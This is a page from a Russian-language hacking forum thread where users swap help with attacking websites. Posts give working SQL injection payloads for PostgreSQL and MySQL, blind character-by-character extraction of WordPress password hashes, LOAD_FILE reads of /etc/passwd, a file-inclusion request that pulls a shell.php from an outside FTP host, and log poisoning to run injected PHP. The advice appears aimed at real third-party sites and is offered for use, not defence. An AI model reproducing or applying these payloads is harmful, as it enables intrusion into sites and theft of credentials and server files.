HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 961 из 2438 « Первая < 461861911951 957 958 959 960 961 962 963 964 965 9711011106114611961 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #9601  
Старый 25.10.2009, 19:23
GenTao
Участник форума
Регистрация: 10.10.2009
Сообщений: 133
С нами: 8730155

Репутация: -1
По умолчанию
Код:
ERROR: UNION types double precision and character varying cannot be matched
БД: PostgreSql. Как проводить запросы в таком случае ?
 
Ответить с цитированием

  #9602  
Старый 25.10.2009, 19:28
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами: 10274726

Репутация: 1917


По умолчанию
Цитата:
Сообщение от GenTao  
Код:
ERROR: UNION types double precision and character varying cannot be matched
БД: PostgreSql. Как проводить запросы в таком случае ?
в PG в union надо соблюсти не только количество полей но и их типы
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием

  #9603  
Старый 25.10.2009, 19:33
GenTao
Участник форума
Регистрация: 10.10.2009
Сообщений: 133
С нами: 8730155

Репутация: -1
По умолчанию
я cast() уже перепробовал.Какой конкретный запрос ?

1+union+select+table_name+from+information_schema. tables+limit+1+offset+1----

Вышла такая хня.В ascii переводить чтоли.
Последний раз редактировалось GenTao; 25.10.2009 в 19:35..
 
Ответить с цитированием

  #9604  
Старый 25.10.2009, 19:39
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
С нами: 10309346

Репутация: 4303


По умолчанию
1;select+table_name::text::int+from+information_sc hema. tables
 
Ответить с цитированием

  #9605  
Старый 25.10.2009, 21:18
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
С нами: 9270510

Репутация: 519


По умолчанию
Привет!
Подскажите плз, почему не пашет РФИ?
script.php?bla=../../../etc/passwd
ВСЕ ОК, а рфи не провелица:

script.php?bla=ftp://loginwd@host/shell.php

Помогите плз.
 
Ответить с цитированием

  #9606  
Старый 25.10.2009, 21:21
AFoST
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
С нами: 9976706

Репутация: 1934


По умолчанию
Цитата:
Сообщение от -m0rgan-  
Привет!
Подскажите плз, почему не пашет РФИ?
script.php?bla=../../../etc/passwd
ВСЕ ОК, а рфи не провелица:

script.php?bla=ftp://loginwd@host/shell.php

Помогите плз.
Тебе никто не даст точного ответа.
Слишком мало информации даешь.
Может быть несколько вариантов, почему не пашет:
1. отключен удаленный инклуд
2. невозможн рфи потому что в скрипте инклудится include("some_dir/".$bla)
__________________
Появляюсь редко. Важные дела в реале.
 
Ответить с цитированием

  #9607  
Старый 25.10.2009, 21:30
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами: 9154406

Репутация: 2221


По умолчанию
Цитата:
Сообщение от AFoST  
Тебе никто не даст точного ответа.
Слишком мало информации даешь.
Может быть несколько вариантов, почему не пашет:
1. отключен удаленный инклуд
2. невозможн рфи потому что в скрипте инклудится include("some_dir/".$bla)
Или на http и ftp проверка.

Цитата:
Сообщение от -m0rgan-
Привет!
Подскажите плз, почему не пашет РФИ?
script.php?bla=../../../etc/passwd
ВСЕ ОК, а рфи не провелица:

script.php?bla=ftp://loginwd@host/shell.php

Помогите плз.
Пробуй через логи.
Последний раз редактировалось Ctacok; 27.10.2009 в 07:15..
 
Ответить с цитированием

  #9608  
Старый 25.10.2009, 22:00
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
С нами: 9270510

Репутация: 519


По умолчанию
Что значит "Через логи" ?
Можна поподробнее?
 
Ответить с цитированием

  #9609  
Старый 25.10.2009, 22:06
Aртем
Познающий
Регистрация: 18.10.2009
Сообщений: 68
С нами: 8717851

Репутация: 90
По умолчанию
Цитата:
Сообщение от -m0rgan-  
Что значит "Через логи" ?
Можна поподробнее?
Это значит записать в лог об ошибках код на подобии <? phpinfo(); die(); ?> и проинклюдить файл.
 
Ответить с цитированием

  #9610  
Старый 25.10.2009, 22:07
_gr34t
Участник форума
Регистрация: 26.10.2008
Сообщений: 106
С нами: 9231812

Репутация: 40
По умолчанию
Цитата:
Сообщение от L I G A  
погоди с выводами.
таблица "wp_users" имеет поле :
user_pass(по дефолту),если найденная тобой скуля работает с таблице пользователей =>подбирай колонку с паролем пользователя, а затем и сам пароль.
колонку с паролем:
Код:
profile.php?id=2+and+length(user_pass)>0
пароль:
Код:
id=2+and+ascii(substring(user_pass,1,1))>127
^Посимвольным перебором.
вот замечательная статья Grey'a - Работа с инъекциями в MySQL третьей версии.
Спасибо за ответ.
Статья и правда замечательная, вчера её прочитал. Из неё и понял, что моя скуля почти бесполезна
В запросе не используется таблица wp_users:
Цитата:
SELECT crnt.post_id FROM wp_post2cat crnt LEFT JOIN wp_post2cat as cat2 USING(post_id) WHERE cat2.category_id =15 or 3=substring(version(),1,1) -- f AND crnt.category_id = 16
LOAD_FILE('/etc/passwd') - работает, можно посимвольно читать.
Но LOAD_FILE('/ip/site/www/wp-config.php') - уже не работает. На сколько я понимаю, права на чтение для папки /ip/site/www/ стоят только для апача (.
Буду искать дальше
 
Ответить с цитированием
Ответ
Страница 961 из 2438 « Первая < 461861911951 957 958 959 960 961 962 963 964 965 9711011106114611961 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.